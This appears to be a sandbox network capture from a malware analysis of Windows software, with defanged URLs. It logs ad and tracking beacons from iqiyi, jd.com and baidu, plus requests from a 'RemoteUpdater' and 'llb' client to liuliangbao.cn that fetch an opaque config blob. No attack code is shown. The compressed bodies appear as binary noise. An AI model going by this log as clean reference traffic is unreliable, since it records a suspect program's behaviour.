deWidgetForId"),e("../../units/appDownload"),e("../../units/tabForId")
,e("../../units/bodanChangeInfo"),e("../../units/ugcVideoRecommend"),e
("../../units/ugcBodanPlayPingback"),e("../../units/ugcBodanPlaySlide"
),e("../../units/ugcBodanRenderData"),e("../../units/bodanPlayAuth"),e
("../../units/bodanPlayerPopup"),e("../../units/baiduPromotion"),e("..
/../units/follow"),e("../../units/ugcVideoListCirclePlay"),e("../../un
its/movieTickets"),e("../../units/activityNotice"),e("../../units/acti
vityNoticeTopNav"),e("../../units/ugcRelatedBodanPingback"),e("../../u
nits/appleAdInPlay"),e("../../units/playerPopup"),e("../../units/safe/
popVip")];o=n.concat(o),a.exports={addJobs:function(){o.forEach(fu<<< skipped >>>

GET /dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_heAb1y8zHhESL05A9jqTN-_xcs6r_ygqa3471hOG2sKfIoo7D2VlowD6Maz-72y8SXfViIdJoaCoS_HPHWJSJDgiGrhcZWBxoUmZ9yyAUMmAo_4aO-ZoVQIQcqIq-yVmKRLtJco4qPxA4XtzpCIBjYyorLiBoLIAbbhd5F0JwLQyDI1lcJyYG-HWtHsKJeo7I1r0b8QXL_sw_iYZQsMnHbXby88qZA7AezNilyO5VjcFnX2hpHyuTKOGiqqeXNKCrRPxeulH-BdCgVIuHM5x2gT2GaRlDqGb8cKpM6du77WlaXoBegrJBDJ8tLBQr2k7TWUMtFrguvyHrXDYXGCSbDyvKIMa_aNdiw8xJyZcXWxfc9Gnr6sRGca4wBnDoeinYT&v=404&seq=1 HTTP/1.1

Accept: */*

Referer: hXXp://x.jd.com/exsites?spread_type=2&ad_ids=198:5&location_info=0&callback=getjjsku_callback

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: im-x.jd.com

Connection: Keep-Alive

Cookie: __jda=.238043269.1484906111.1484906111.1484906111.0


HTTP/1.1 200 OK

Server: openresty

Date: Fri, 20 Jan 2017 09:55:11 GMT

Content-Type: image/gif

Transfer-Encoding: chunked

Connection: close

Expires: Fri, 20 Jan 2017 09:55:10 GMT

Cache-Control: no-cache

0..

GET /clt/config/bl_6.5.dat?t=1484423401&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6 HTTP/1.1

Cache-Control: no-cache

User-Agent: RemoteUpdater : 6.5.73.5

Host: cltres.liuliangbao.cn

Connection: Close


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:13 GMT

Content-Type: application/octet-stream

Content-Length: 3602

Last-Modified: Sat, 14 Jan 2017 19:50:01 GMT

Connection: close

ETag: "587a80e9-e12"

Accept-Ranges: bytes

1IFI9F5a7a84326af6466b1f66376af769acf9d41d8cd98f00b204e9800998ecf8427e
e88fb7cac6e8c98970e813eedf78f04415ac0487ada111e3e88fb7cac6e8c98996fd64
5f266af21626a8fafe022ed585e88fb7cac6e8c989e714c1120787953433605210cb02
f5ec793e6354d5d2707287efb727b6dd20ea0ea8463492dbde5d9a58a32fb4dcd06bad
405b5bbb5777372f5297ea369b023735bf030fc451e29c3d083a48f95d522abbf26cb5
5696ce2f1e47a4782178fcb251224b387d89a6b5c12722edbbd75af28da5c11b11bde2
e1c5904bf3994335d20300024d61ef93cfd9615e6ba92d16f24bd2aa7faf92c9f7c354
e97314d3b58354331d4a7704a2e4c244a1f2d3db7c776bd50f250fcb472f6f99762727
8bf55e99690ac4ff4368a3a9cf679b385106b442391bdea44196005e75c9010a73c19b
e4356dd1ce20dd531b32a0cc62fd508873ce6516a1f598d9467fd7703b9cf9f2dc8f91
a7793efc4b9b57a8a2b86ec075cec1f8b4cc53f407207dbaeaf30973e38b8bc26c7389
0e09a0fe86f758e47819878e7b672b29f3870175716f9c8d41b85794b18bbb3630d6d3
067d6758e3ba43af7744d06046b1ab375cee922abd80d150a625901140d45893577586
fc7ccecba0fe86f758e47819878e7b672b29f387997c87f84df8b317ebc744b97b9a5d
d83e07bcf411b2083b279440cd7eff46a0478827a3891e5b8ea018b0f3389ed8db8c8f
4f44ec5829866d96ee3173ba7cb6727989611ac6f1c207722402c5ef8e532806ae710e
75dd343dce34b9cd4f61d472791c942c4dcc93e88fb7cac6e8c989e4903ea4d8e55772
17c38f9fd210f4b4793e6354d5d270721a62991baa24c4c26a267493f498e3ac3673ae
47a5270cfbf34159a1a28e27838381abc59e296484157c659be11c62be56aa0bd49eb3
135b750aa0a9fb0ec456dee9d05bda55bd2b267eae8bc378d1feabbddbc69f357ed5e8
8fb7cac6e8c9899309daa3732ca9eec86ceb1b78298c4a793e6354d5d270724eeada65
50cc8962808fad2359560b739a58a32fb4dcd06b1e1426f7401a66b4b4d08b5ac3

<<< skipped >>>

GET /ugc-updown/quud.do?dataid=572044000&type=2&userid=&flashuid=5088e17771f6d54476f95dc61f9e80b4&appID=21&callback=window.Q.__callbacks__.cbrokkg9 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: up.video.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1; QC005=5088e17771f6d54476f95dc61f9e80b4; QC010=137349363; T00404=9b9366963d49845dcaef1cf22d487ad8; QC118={"color":"FFFFFF","channelConfig":0}


HTTP/1.1 200 OK

Server: openresty

Date: Fri, 20 Jan 2017 09:55:21 GMT

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Cache-Control: no-store

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Pragma: no-cache

Content-Encoding: gzip
ae............]....0.E.eV.$...u.e...0&....$V$..;.]g1\...D..}X....).q.z
.cP....q|.........9PB.f.". A...W..RTT...]...m~..d#x]....C.....(..<y
Z&....%..........m....5.K........1.........0..HTTP/1.1 200 OK..Server:
 openresty..Date: Fri, 20 Jan 2017 09:55:21 GMT..Content-Type: text/ht
ml;charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..
Vary: Accept-Encoding..Cache-Control: no-store..Expires: Thu, 01 Jan 1
970 00:00:00 GMT..Pragma: no-cache..Content-Encoding: gzip..ae........
....]....0.E.eV.$...u.e...0&....$V$..;.]g1\...D..}X....).q.z.cP....q|.
........9PB.f.". A...W..RTT...]...m~..d#x]....C.....(..<yZ&....%...
.......m....5.K........1.........0..

GET /crossdomain.xml HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: t7z.cupid.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:13 GMT

Content-Type: text/xml

Content-Length: 222

Last-Modified: Fri, 11 Oct 2013 05:40:45 GMT

Connection: keep-alive

ETag: "52578f5d-de"

Expires: Sat, 21 Jan 2017 09:55:13 GMT

Cache-Control: max-age=86400

Accept-Ranges: bytes
<?xml version="1.0"?>.<cross-domain-policy> <site-contr
ol permitted-cross-domain-policies="all" />.    <allow-access-fr
om domain="*" />.    <allow-http-request-headers-from domain="*"
 headers="*"/>.</cross-domain-policy>..HTTP/1.1 200 OK..Serve
r: nginx/1.8.0..Date: Fri, 20 Jan 2017 09:55:13 GMT..Content-Type: tex
t/xml..Content-Length: 222..Last-Modified: Fri, 11 Oct 2013 05:40:45 G
MT..Connection: keep-alive..ETag: "52578f5d-de"..Expires: Sat, 21 Jan 
2017 09:55:13 GMT..Cache-Control: max-age=86400..Accept-Ranges: bytes.
.<?xml version="1.0"?>.<cross-domain-policy> <site-cont
rol permitted-cross-domain-policies="all" />.    <allow-access-f
rom domain="*" />.    <allow-http-request-headers-from domain="*
" headers="*"/>.</cross-domain-policy>......


GET /show2?a=qc_100001_100226&e=E15qBgIABAQBbwEWU1MPBlcAOwwAFlNGDGofAx4AHAJGRTsMABZVUQxuF1dEDwMQHV5vF14NABZBMAwBFkJAC0FFL0INABZAR2IAFkEPUUJLUnlCRg0DHgdsHwAWR14LGRcrQQofH0dGKB9ZQVtLX18AMFwfRm8BCC1DUQNYRgFBTTdFXVwWRgxvF0ZVW1YLSFs5AlYACAQCZlIGCFELVERUPQIFAgBWAWkIBlZQAFVXFGIBFkkNAA==&h=1484906112411&s=60d34018ac24eb58180b7eb57af7bbf5 HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf/[[DYNAMIC]]/1

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: t7z.cupid.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1; QC005=5088e17771f6d54476f95dc61f9e80b4; QC010=137349363


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:14 GMT

Content-Type: text/plain; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Set-Cookie: T00404=9b9366963d49845dcaef1cf22d487ad8; Version=1; Expires=Mon, 15 Jan 2018 09:55:14 GMT; Max-Age=31104000; Domain=.iqiyi.com; Path=/

Access-Control-Allow-Credentials: true

Cache-Control: no-cache

P3P: CP="ALL DSP COR NID"

Content-Encoding: gzip
4ae.............U]o.8..A.p....G.".Q....KJo.dKW......_.K'...8.........x
...Z.j.l.......*.....CWd.6..9....T..rS.iliUe..............=.yz.<w..
..1!-.^.O;-A..r.C.@\\f....>..oQ.-po......UyC0....i..t....H...A..T.0
n0.B..M.g......u.\S..SM.F_.iL6.~eE0.xk..s.w`H.v.xL6.".T.Fd.y.IH..y/. .
.Qj.t(;;a!-H..B.:...R.G.........Z!.....3H..P.{....\$.O'.7. ",pR.......
.d^.k.#.J....<..5..<...F."/ o}.=........]....4.z0F....F&.o....2.
.y5...{......9. c....|....?....P..Z.....T.~.s...w;Y..q......M...XX.8..
..'...S.D..C.i....;.'.N\....|.....V.qn.s....'z....2}.d;.#...8T..yHC...
./...."..Y.....<A........G......K...U.\y......?. ..o...er.. .._..x.
.\{,g..-jt.......*S......#...>/.-R....S....q....~sj...2...4n.b....R
>..T. .e...~..5&.'.[%..c}.W~_.e|.[..u...!.x..i....-&E.v...\..,p...q
.-y.....25.._.....S...A.'?.^..'..-G~.I.....{.>..j|...Rre...%.SB..X.
B]..;.......}W..@}.......@...#...U6.C..;.}...v4............ .....#.9E.
1.iR..r.V......{.ub^:.l..s...<:....'Z..".^5:....yr..2....8.$.......
$.v.c...1.4Z.m..B......y.q.(......g...;.S[..Z....\b.....Z.....bNM%...=
....SH.....f.z.~..J. .RM.?Z:[Z.=..[...*..l.>f^o9[2.p$........_.....
.....{.?w8....A..7.UA....s.T.9......<..3......796.._.k..q.lu.......
>.....O%.._.8..3.B....I.7.GM4..Ei)....".........a.......^......0..<
/font>....<<< skipped >>>

GET /show2?a=qc_100001_100226&e=E15qBgIABAQBbwEWU0QPA19QcQMeBAcWVWIEBxZXUwtARThFDQEWXAxtAQQEAQAGQVJ5Xw0AFkBeYgEWQEAPBlcTLAwAFkBGDG4XQQ1IWwxAU28BAAAAAAFvBAMGHlFCS1NkS1kKAQABbwEAAAICBkdQbx1TRAoACiVYCgECAgZBU28BAAAAAwhzUkQKAglMGFluAQAAAAABbwEAAAYCGhIXZQELSlkKAG8BAAACAgZBU2wDARxTRAtvF0NGDwEYR1BxARZFXA1ZK0VACh0dQQYUcVhBWUlZHzxeXR9EbQdIES1QA1pEBwFxWURdXhRATFN5R1VZVA0IZ1cDVgIKAkJaPAcIUwlSBGhTAwUAAlBBVWYHVlICUxcoDAAWSw8G&h=1484906114377&s=8f6f04431c47096fdb4b10b9161f986a HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf/[[DYNAMIC]]/1

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: t7z.cupid.iqiyi.com

Connection: Keep-Alive

Cookie: Hm_lvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; Hm_lpvt_53b7374a63c37483e5dd97d78d9bb36e=1484906109; QC007=DIRECT; QC006=o5rodndzg8of8s4mwfefai5c; QC008=1484906110.1484906110.1484906110.1; QC005=5088e17771f6d54476f95dc61f9e80b4; QC010=137349363; T00404=9b9366963d49845dcaef1cf22d487ad8


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:14 GMT

Content-Type: text/plain; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Set-Cookie: T00404=9b9366963d49845dcaef1cf22d487ad8; Version=1; Expires=Mon, 15 Jan 2018 09:55:14 GMT; Max-Age=31104000; Domain=.iqiyi.com; Path=/

Access-Control-Allow-Credentials: true

Cache-Control: no-cache

P3P: CP="ALL DSP COR NID"

Content-Encoding: gzip
679............lVM.....A...}....JH...].I...."......'.>%z:.-f.......
4k..dB....w..J...p..Ib......z1.A.....i..*w.....4.?fc!.y..........(q{..
j.....@NG..^........M&.77>].............E..&.....I....i.B.W%...jV..
.;...~.....:..N`..c.....5c..=.........8JG.r,.6.....rU..4..4K..TU8.i.3-
K'@....Y..L.....~Y.H...=4.2.........0...aLD.8.h......jJ..S...h...q...$
..v..K'...~.L..?....T.._.R'.S....q..4......(k.|...!..F...0RC....p.`t.G
..;4.k..P.6..g<..!..q.m<.....U..0...A.wgf......r.OCG....N.6.e..C
@`......)I.m.c....,.K....%U.. PT.;...g....Z..b.'...[;Q.....p~.[.......
..... .B.......YM..J.f.e..Z.A..y....EM...>w.....c.....!..... ^...v.
..&......@...M..|..m.|..#7.-$....RU.=I...$.f......^.%u.".....N".j.u~-.
...........U.n..6.r..14...}.bq..o.../.<3..C....&...{....J.:s....QQ/
W...g.O.Z..O...n....1..<..XF.6..A.}#...lm>w.5qQ.A.uW..'.m..vfW.4
x..7..........b.......|...2.J.&..=..;..D.K.. ..,/.....F......4oL..'.Z.
.;s........ .z^..ck.g..W...!M...4A...GY...c..vi..g*=...;.-........!w.h
|Q....8.m.X.oQ.u.!.u..xLu. ..K..g..r2......3 ..%....6.J...H...j.z~....
c#.jl(_.t< [.L.e.......i...B.==..G.../(e....a..~...1`.......QK.....
...l9.....;..I..^].)..f.Y(9....eI..f..r.aW.qN..........>b..........
9...Y.....v.M.I.{...hB.#.j.....f.B...P..-e..S6....[.....Yy5.....A....d
.....=v...t.O0........T...6........(3._ ."..a....{c.=rLM.Y...&WG.mU...
.~.,v........j....Uy."..L..<......$. ~6|i...?..6...T.t...1.........
.H....h...G..p6d.f^v....K.(.L!........8....2...y/b.m.@. wA%...Y..q..}.
....4....G.v..O...D2.......uc..s7..#j..#.|....X..._...c|.L.la..y..<<< skipped >>>

GET /v.gif?pid=324&qiyi_cookie=&t=1484906112271 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: nsclick.baidu.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Accept-Ranges: bytes

Cache-Control: max-age=0

Content-Length: 0

Content-Type: image/gif

Date: Fri, 20 Jan 2017 09:55:14 GMT

Etag: "4280832337"

Expires: Fri, 20 Jan 2017 09:55:14 GMT

Last-Modified: Fri, 23 Oct 2009 08:06:04 GMT

Pragma: no-cache

Server: BWS/1.0

HTTP/1.1 200 OK..Accept-Ranges: bytes..Cache-Control: max-age=0..Conte
nt-Length: 0..Content-Type: image/gif..Date: Fri, 20 Jan 2017 09:55:14
 GMT..Etag: "4280832337"..Expires: Fri, 20 Jan 2017 09:55:14 GMT..Last
-Modified: Fri, 23 Oct 2009 08:06:04 GMT..Pragma: no-cache..Server: BW
S/1.0..

GET /tmpstats.gif?type=piaoshhtestmayttf&job=ugcbodanplay&des=findpagebyjob&url=http://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&entry=Q.load&prj=qiyiV2&_=1776244267 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:11 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive
HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 20 Jan 2017 09:55:11 
GMT..Content-Type: image/gif..Content-Length: 0..Connection: keep-aliv
e......


GET /vpb.gif?flag=plyract&plyract=svrs&aid=&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=&lev=&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=&ispur=&as=b7ec007eeb7742d5c4f169def66e0c67&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.11122033419087529 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:11 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive
HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 20 Jan 2017 09:55:11 
GMT..Content-Type: image/gif..Content-Length: 0..Connection: keep-aliv
e......


GET /cp2.gif?x=http://VVV.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf||http://VVV.iqiyi.com/common/flashplayer/20170119/036300cf212b7b.swf&p=v&lc=http://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&s=1484906112396&t=s&b=0&c=0&v=572044000&av=AdManager 3.63.0&fp=WIN 23,0,0,185&e=98f3f08439c68c9b57b3520f0696fb2c&vv=5.3.2.47&y=qc_100001_100226&pl=0 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:12 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive
HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 20 Jan 2017 09:55:12 
GMT..Content-Type: image/gif..Content-Length: 0..Connection: keep-aliv
e......


GET /vpb.gif?flag=plyract&plyract=vrld&vms=1&tl=2539&aid=&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=&lev=&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=&ispur=&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.12644612696021795 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:14 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive
HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 20 Jan 2017 09:55:14 
GMT..Content-Type: image/gif..Content-Length: 0..Connection: keep-aliv
e......


GET /vpb.gif?flag=plyract&plyract=ready&purl=http://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&vvfrmtp=manclick&rfr=&lrfr=DIRECT&aid=204432001&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=10&lev=2&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=2&ispur=0&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.8087925375439227 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:14 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive
....


GET /jpb.gif?rdm=1738841934&qtcurl=http://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&rfr=&lrfr=DIRECT&jsuid=o5rodndzg8of8s4mwfefai5c&qtsid=1484906110,1484906110,1484906110,1&ppuid=&platform=11&fcode=&ffcode=&coop=&weid=11d91127a84babbf6dabdf9e702b5f03&pru=&fvcode=&mod=cn_s&tmplt=bodantplt&flshuid=5088e17771f6d54476f95dc61f9e80b4&as=c6ef95c1f39a49124dae509aae8e1a88 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive

GET /cp2.gif?ps=0&rd=1966&h=0&p=s&rc=1&s=1484906114377&a=9b9366963d49845dcaef1cf22d487ad8&t=s&b=204432001&c=10&av=AdManager 3.63.0&e=98f3f08439c68c9b57b3520f0696fb2c&rid=60d34018ac24eb58180b7eb57af7bbf5&vv=5.3.2.47&l=MTk0LjI0Mi45Ni4yMTg=&y=qc_100001_100226&d=57&g=0 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:14 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive
....


GET /vpb.gif?flag=plyract&plyract=activeplay&aid=204432001&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=10&lev=2&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=2&ispur=0&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.4783940138295293 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:15 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive
....


GET /vpb.gif?flag=startvisits&newusr=1&vid=787ab6983c8a883fa3c5190ce3cac804&aid=204432001&tvid=572044000&cid=10&purl=http://VVV.iqiyi.com/v_19rra3jt70.html&lev=2&puid=&pru=&suid=5088e17771f6d54476f95dc61f9e80b4&visits=&pla=11&weid=11d91127a84babbf6dabdf9e702b5f03&veid=0418909173dcc97c13d68d5c2ee32172&coop=&ctgid=0&plid=572044000&vvfrom=lianbo&mod=cn_s&tn=0.2609360576607287 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:15 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive
....


GET /cp2.gif?ps=0&h=0&ri=0:n1:1000000001251;0:n1:1000000001268;0:n1:1000000001827;0:n1:1000000005931;0:n1:1000000008849;&oi=0:n1:1000000001251;0:n1:1000000001268;0:n1:1000000001827;0:n1:1000000005931;0:n1:1000000008849;&p=i&s=1484906115563&di=0:n1,88,5000000911968,:1000000005931;&a=9b9366963d49845dcaef1cf22d487ad8&t=s&b=204432001&c=10&v=572044000&av=AdManager 3.63.0&e=98f3f08439c68c9b57b3520f0696fb2c&rid=8f6f04431c47096fdb4b10b9161f986a&vv=5.3.2.47&l=MTk0LjI0Mi45Ni4yMTg=&y=qc_100001_100226&d=57&g=0 HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:15 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive
....


GET /b?t=20&p=10&p1=101&pf=1&block=B&r=&pu=null&u=5088e17771f6d54476f95dc61f9e80b4&jsuid=o5rodndzg8of8s4mwfefai5c&ce=11d91127a84babbf6dabdf9e702b5f03&re=1504*175629&clkx=0&clky=0&mod=cn_s&tm=8205&tmplt=dianshijunewtmplt&qpid=572044000&rseat=608241_cls_default&_=1166079991 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.71.am

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:16 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 20 Jan 2017 09:55:16 
GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-aliv
e..

POST /ts/f3.1/ HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: llb/1.1.73.813

Host: ap3.liuliangbao.cn

Content-Length: 564

Connection: Keep-Alive

Cache-Control: no-cache

